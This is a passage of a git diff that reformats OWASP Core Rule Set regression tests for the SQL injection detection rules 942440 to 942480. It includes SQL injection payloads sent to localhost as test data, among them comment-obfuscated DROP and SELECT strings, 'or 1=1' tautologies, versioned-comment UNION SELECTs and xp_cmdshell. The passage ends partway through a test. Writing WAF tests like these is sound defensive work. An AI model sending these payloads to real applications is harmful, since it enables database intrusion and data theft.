text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=DR/**/OP/*bypass deny listing*/sampletable" - output: - log_contains: id "942440" - - test_title: 942440-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=DR/**/OP/*bypass deny listing*/sampletable" + output: + log_contains: id "942440" + - test_id: 7 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=SELECT/*avoid-spaces*/password/**/FROM/**/Members" - output: - log_contains: id "942440" - - test_title: 942440-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=SELECT/*avoid-spaces*/password/**/FROM/**/Members" + output: + log_contains: id "942440" + - test_id: 8 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=SELECT /*!32302 1/0, */ 1 FROM tablename" - output: - log_contains: id "942440" - - test_title: 942440-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=SELECT /*!32302 1/0, */ 1 FROM tablename" + output: + log_contains: id "942440" + - test_id: 9 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=' or 1=1# " - output: - log_contains: id "942440" - - test_title: 942440-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=' or 1=1# " + output: + log_contains: id "942440" + - test_id: 10 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=‘ or 1=1-- -" - output: - log_contains: id "942440" - - test_title: 942440-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=‘ or 1=1-- -" + output: + log_contains: id "942440" + - test_id: 11 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=‘ or 1=1/*" - output: - log_contains: id "942440" - - test_title: 942440-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=‘ or 1=1/*" + output: + log_contains: id "942440" + - test_id: 12 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=1='1' or-- -" - output: - log_contains: id "942440" - - test_title: 942440-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=1='1' or-- -" + output: + log_contains: id "942440" + - test_id: 13 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=' /*!50000or*/1='1" - output: - log_contains: id "942440" - - test_title: 942440-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=' /*!50000or*/1='1" + output: + log_contains: id "942440" + - test_id: 14 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=' /*!or*/1='1" - output: - log_contains: id "942440" - - test_title: 942440-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=' /*!or*/1='1" + output: + log_contains: id "942440" + - test_id: 15 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=0/**/union/*!50000select*/table_name`foo`/**/" - output: - log_contains: id "942440" - - test_title: 942440-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=0/**/union/*!50000select*/table_name`foo`/**/" + output: + log_contains: id "942440" + - test_id: 16 desc: "Avoid False Positive on JWT (body)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - method: "POST" - port: 80 - version: "HTTP/1.1" - uri: "/post" - data: "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" - output: - no_log_contains: id "942440" - - test_title: 942440-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + method: "POST" + port: 80 + version: "HTTP/1.1" + uri: "/post" + data: "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" + output: + no_log_contains: id "942440" + - test_id: 17 desc: "Avoid False Positive on JWT (cookie)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Cookie: "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" - method: "POST" - port: 80 - version: "HTTP/1.1" - uri: "/post" - data: "foo=bar" - output: - no_log_contains: id "942440" - - test_title: 942440-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Cookie: "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" + method: "POST" + port: 80 + version: "HTTP/1.1" + uri: "/post" + data: "foo=bar" + output: + no_log_contains: id "942440" + - test_id: 18 desc: "Avoid False Positive on JWT (querystring)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - method: "GET" - port: 80 - version: "HTTP/1.1" - uri: "/get/callback?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" - output: - no_log_contains: id "942440" - - test_title: 942440-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + method: "GET" + port: 80 + version: "HTTP/1.1" + uri: "/get/callback?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" + output: + no_log_contains: id "942440" + - test_id: 19 desc: "False positive against Facebook click identifier" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - method: "GET" - port: 80 - version: "HTTP/1.1" - uri: "/get?fbclid=IwAR1dug0BYxe0ukhZ2vKrdQwLAxVFRJ--Q2Y7OBJE_0uId9-Eh-sJWLdVk2E" - output: - no_log_contains: id "942440" - - test_title: 942440-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + method: "GET" + port: 80 + version: "HTTP/1.1" + uri: "/get?fbclid=IwAR1dug0BYxe0ukhZ2vKrdQwLAxVFRJ--Q2Y7OBJE_0uId9-Eh-sJWLdVk2E" + output: + no_log_contains: id "942440" + - test_id: 20 desc: "False positive against Google click identifier" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - method: "GET" - port: 80 - version: "HTTP/1.1" - uri: "/get?gclid=j0KCQiA1NebBhDDARIsAANiDD3_RJeMv8zScF--mC1jf8fO8PDYJCxD9xdwT7iQ59QIIwL-86ncQtMaAh0lEALw_wcB" - output: - no_log_contains: id "942440" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + method: "GET" + port: 80 + version: "HTTP/1.1" + uri: "/get?gclid=j0KCQiA1NebBhDDARIsAANiDD3_RJeMv8zScF--mC1jf8fO8PDYJCxD9xdwT7iQ59QIIwL-86ncQtMaAh0lEALw_wcB" + output: + no_log_contains: id "942440" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml index 7d3203112..7d86d5a89 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml @@ -2,91 +2,84 @@ meta: author: "William Woodson, azurit" description: None - enabled: true - name: 942450.yaml tests: - - test_title: 942450-1 + - test_id: 1 desc: "SQL Hex Encoding" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=%5c0xf00dsdfdsa" - version: HTTP/1.0 - output: - log_contains: id "942450" - - test_title: 942450-2 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=%5c0xf00dsdfdsa" + version: HTTP/1.0 + output: + log_contains: id "942450" + - test_id: 2 desc: "SQL Hex Encoding" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=concat%280x223e3c62723e%2Cversion%28%29%2C0x3c696d67207372633d22%29" - version: HTTP/1.0 - output: - log_contains: id "942450" - - test_title: 942450-3 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=concat%280x223e3c62723e%2Cversion%28%29%2C0x3c696d67207372633d22%29" + version: HTTP/1.0 + output: + log_contains: id "942450" + - test_id: 3 desc: "SQL Hex Encoding" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=select%200x616263" - version: HTTP/1.0 - output: - log_contains: id "942450" - - test_title: 942450-4 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=select%200x616263" + version: HTTP/1.0 + output: + log_contains: id "942450" + - test_id: 4 desc: "SQL Hex Encoding - negative" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=IHRlc3Q0xAcF" - version: HTTP/1.0 - output: - no_log_contains: id "942450" - - test_title: 942450-5 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=IHRlc3Q0xAcF" + version: HTTP/1.0 + output: + no_log_contains: id "942450" + - test_id: 5 desc: "SQL Hex Encoding - negative" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08" - version: HTTP/1.0 - output: - no_log_contains: id "942450" + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08" + version: HTTP/1.0 + output: + no_log_contains: id "942450" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml index 7d99328e2..7ce8f78c5 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml @@ -2,40 +2,36 @@ meta: author: "Franziska Bühler, azurit" description: None - enabled: true - name: 942460.yaml tests: - - test_title: 942460-1 + - test_id: 1 desc: "Repetitive Non-Word Characters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=foo...." - version: HTTP/1.1 - output: - log_contains: id "942460" - - test_title: 942460-2 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=foo...." + version: HTTP/1.1 + output: + log_contains: id "942460" + - test_id: 2 desc: "Repetitive Non-Word Characters negative test only 3 characters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=foo..." - version: HTTP/1.1 - output: - no_log_contains: id "942460" + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=foo..." + version: HTTP/1.1 + output: + no_log_contains: id "942460" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml index e2b679c1a..894edcb3e 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml @@ -2,192 +2,179 @@ meta: author: "Christoph Hansen, azurit" description: None - enabled: true - name: 942470.yaml tests: - - test_title: 942470-1 + - test_id: 1 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=nvarchar" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=nvarchar" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_id: 2 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=xp_cmdshell" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=xp_cmdshell" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_id: 3 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=varchar" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=varchar" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_id: 4 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=xp_dirtree" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=xp_dirtree" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_id: 5 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=xp_regread" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=xp_regread" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_id: 6 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=sp_password" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=sp_password" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_id: 7 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=UTL_HTTP" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=UTL_HTTP" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_id: 8 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=OPENROWSET" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=OPENROWSET" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_id: 9 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=sp_executesql" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=sp_executesql" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_id: 10 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "sp_executesql" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "sp_executesql" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_id: 11 desc: "SQL Injection Attack: current_user" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=1%2bcurrent_user::int" - version: HTTP/1.0 - output: - log_contains: id "942470" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=1%2bcurrent_user::int" + version: HTTP/1.0 + output: + log_contains: id "942470" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml index af47b1574..e0b642eec 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml @@ -2,210 +2,209 @@ meta: author: "Jose Nazario, azurit" description: None - enabled: true - name: 942480.yaml tests: - - test_title: 942480-1 + - test_id: 1 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # variable name boundary attacks + uri: "/?'msdasql'" + version: HTTP/1.0 + output: + log_contains: "id \"942480" + - test_id: 2 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + Cache-Control: "no-cache, 